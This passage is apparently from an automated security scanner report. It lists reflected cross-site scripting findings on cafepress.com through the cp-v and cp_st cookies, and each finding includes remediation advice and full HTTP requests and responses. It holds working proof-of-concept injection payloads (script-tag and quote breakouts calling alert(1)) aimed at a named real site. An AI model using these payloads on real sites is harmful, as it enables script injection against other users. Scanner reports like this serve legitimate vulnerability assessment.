<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... afepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/error404.aspx?404;http://www.cafepress.com:80/+Eat+Sleep+Game+Light+T-Shirt,2990075362ebb4</script><script>alert(1)</script>df6f6b5b741 ' window.cafepress.tealeaf.searchTerm = '' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress...[SNIP]...
1.2. http://www.cafepress.com/ [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc0ca"-alert(1)-"bbefee824fc was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAcc0ca"-alert(1)-"bbefee824fc ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 75201 Date: Sun, 26 Dec 2010 13:46:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 75201 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAcc0ca"-alert(1)-"bbefee824fc "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.3. http://www.cafepress.com/ [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adbea</script><script>alert(1)</script>c2b3851b0e4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=adbea</script><script>alert(1)</script>c2b3851b0e4 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 75223 Date: Sun, 26 Dec 2010 13:46:46 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 75223 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... n_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'HomePage' window.cafepress.tealeaf.searchTerm = 'adbea</script><script>alert(1)</script>c2b3851b0e4 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.4. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e15e"-alert(1)-"05104e4ef1f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA1e15e"-alert(1)-"05104e4ef1f ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 93201 Date: Sun, 26 Dec 2010 13:46:53 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93201 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA1e15e"-alert(1)-"05104e4ef1f "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.5. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2434e</script><script>alert(1)</script>da77cba4a3a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=2434e</script><script>alert(1)</script>da77cba4a3a ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 Cteonnt-Length: 93261 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=49f12%00%0d%0a462543dabee; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:51 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:51 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93261 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'ProductDetails' window.cafepress.tealeaf.searchTerm = '2434e</script><script>alert(1)</script>da77cba4a3a ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.6. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5445"-alert(1)-"653f5650114 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
__cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAc5445"-alert(1)-"653f5650114 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 93186 Date: Sun, 26 Dec 2010 13:46:58 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93186 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc5445"-alert(1)-"653f5650114 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.7. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1f9d</script><script>alert(1)</script>c7da687b934 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
